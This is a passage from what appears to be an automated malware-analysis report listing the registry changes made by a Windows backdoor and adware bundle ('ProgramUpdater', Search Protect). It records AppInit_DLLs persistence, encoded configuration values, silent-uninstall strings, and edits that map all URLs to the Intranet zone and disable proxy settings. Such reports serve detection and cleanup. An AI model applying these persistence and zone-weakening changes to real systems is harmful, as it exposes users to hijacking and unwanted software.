"c99a5f5c" = "///%"
"72758a5d" = "///%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"65114b36" = "Vl/l////"

[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"Install_Dir" = "%Program Files%\\ProgramUpdater"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"3c09c42b" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"bbf88800" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"data.0" = "EhAzvh69FPBF1QQIKEjFslfY7xq75BgUTdENBz6WBESt9QV5qGgSD3aWu9scPyVfS42NVZxh9/XZ"
"data.1" = "TQIce3jgQ9cnvcdefAVs2 yFbmPebjlTQbyxYAVXHkfV3t2SIFS7gu2beWuShY3y1X4jBDu77eFg9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"uuid" = "3c84ccde-8cba38c6-a8a67a25"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"dbaf3ce3" = "/P////%%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}]
"6a096ac0" = "%Program Files%\ProgramUpdater\Assistant.dll"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"uuid" = "3c84ccde-8cba38c6-a8a67a25"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{6a096ac0}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\PROGRA~1\ASSIST~1.DLL,_uninstall /un /uq"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\00000000]
"3efeb33e" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"c24899a6" = "MP/f/CF/Mx/l/C/////%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"Mode" = "4026531840"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"Version" = "22021985"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"dlpath" = "c:\progra~1\progra~1\assist~1.dll"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"0c230bcb" = "///%"
"7367429f" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"38583bc3" = "N//e/Ct/Vx/l/C/////%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"c24899a6" = "MP/f/CF/Mx/l/C/////%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{6a096ac0}]
"Publisher" = "Certified Publisher"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"060df2cd" = "G/Ay/YP/FPAt/X6/clAj/Xl/alAy/XP/blAs/XD/ax/j/Xt/axAv/X6////%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{6a096ac0}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\PROGRA~1\ASSIST~1.DLL,_uninstall /un"
"DisplayName" = "ProgramUpdater 1.80"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs" = "c:\progra~1\searchprotect\searchprotect\bin\spvc32loader.dll c:\progra~1\progra~1\assist~1.dll"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"a1dcff5b" = "V/////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"svi" = "0"
"svpath" = "c:\progra~1\progra~1\AssistantSvc.dll"
"svn" = "ProgramUpdater"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"1c311243" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"svx" = ""

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\00000000]
"493c7345" = ""

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"usr.0" = "SDlOIyTVNPRJLFHwys"
"usr.1" = "OoAzvzVNPRJLFHwysu"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"587b5709" = "V/////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"svt" = "1406946132"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB 1F B8 5B 36 4A 20 5F 06 0C BD 69 70 B6 95 50"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\00000000]
"370856c7" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\00000000]
"370856c7" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"c99a5f5c" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"State" = "0"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"LRTS" = "0"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"LRTS" = "0"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"d94388d2" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"date" = "1406946131"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"f0bf0bde" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"0c230bcb" = "///%"
"f2c53c49" = "UlAr/XJ/c//k////"
"a1dcff5b" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"38583bc3" = "N//e/Ct/Vx/l/C/////%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"65114b36" = "Vl/l////"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{6a096ac0}]
"CategoryName" = ""

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"340d3099" = "///%"
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}]
"n" = "1"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"414bc593" = "///%"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"2d71d5ab" = "V/////%%"
"e8f9dcc7" = "UlAr/XJ/c//k////"
"51d2f2ea" = "J/Af/X6/GlAf/XD/aPAK/Y//G/Ay/YP/GPAf/B//VP/j/Cx/V/////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"1c311243" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"data.1" = "TQIce3jgQ9cnvcdefAVs2 yFbmPebjlTQbyxYAVXHkfV3t2SIFS7gu2beWuShY3y1X4jBDu77eFg9"
"data.0" = "EhAzvh69FPBF1QQIKEjFslfY7xq75BgUTdENBz6WBESt9QV5qGgSD3aWu9scPyVfS42NVZxh9/XZ"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"c5705860" = "Vx////%%"
"27ddcf6f" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"d94388d2" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"
"414bc593" = "///%"
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"iiid" = "1"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"Mode" = "4026531840"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"a0743acc" = "N/////%%"
"a2e3b941" = "///%"
"0e93c3f3" = "///%"
"51d2f2ea" = "J/Af/X6/GlAf/XD/aPAK/Y//G/Ay/YP/GPAf/B//VP/j/Cx/V/////%%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"a2e3b941" = "///%"
"a0743acc" = "N/////%%"

"7f69fa1f" = "///%"
"fe94ce1e" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{6a096ac0}]
"NoRepair" = "1"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"587b5709" = "V/////%%"
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"0dc3ee96" = "/P////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"8b9e4cbc" = "V/////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"fe94ce1e" = "V/////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\00000000]
"493c7345" = ""

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"7f69fa1f" = "///%"
"e46c271e" = "///%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"72758a5d" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"3c09c42b" = "///%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\00000000]
"3efeb33e" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"c5705860" = "Vx////%%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"usr.1" = "OoAzvzVNPRJLFHwysu"
"usr.0" = "SDlOIyTVNPRJLFHwys"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"060df2cd" = "G/Ay/YP/FPAt/X6/clAj/Xl/alAy/XP/blAs/XD/ax/j/Xt/axAv/X6////%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"iiid" = "1"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"bbf88800" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"6185d035" = "VP/h/CP/V//l////"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"date" = "1406946131"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following registry key(s):

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sp-downloader.exe:1716 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoC1.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nskC5.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsqB9.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB4.tmp\,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 15 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 2A E2 A9 81 84 36 BD 7B 42 E1 78 3D 42 64 38"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process CltMngSvc.exe:1784 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB CD 84 90 AB DA D3 E6 6F 05 ED 27 A4 02 3E E1"

The process CltMngSvc.exe:1640 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 E0 2D 82 B3 B2 7D 21 1F F6 1C 23 7A AF 28 6C"

The process nsoBA.tmp:2012 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\SearchProtect]
"SPID" = "SP02A809A1-AD66-49FC-9E31-72DC6687025A"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs" = "C:\PROGRA~1\SearchProtect\SearchProtect\bin\SPVC32Loader.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SearchProtect]
"Publisher" = "Client Connect LTD"

[HKLM\SOFTWARE\SearchProtect]
"Environment" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SearchProtect]
"UninstallString" = "C:\PROGRA~1\SearchProtect\Main\bin\uninstall.exe /S"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SearchProtect]
"DisplayVersion" = "2.16.10.61"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\SearchProtect]
"InstallDir" = "C:\PROGRA~1\SearchProtect"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SearchProtect]
"DisplayIcon" = "C:\PROGRA~1\SearchProtect\SearchProtect\bin\cltmng.exe"
"DisplayName" = "Search Protect"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B9 DA 6C A1 E0 05 3D D3 D8 D5 21 6B 59 96 9D 16"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
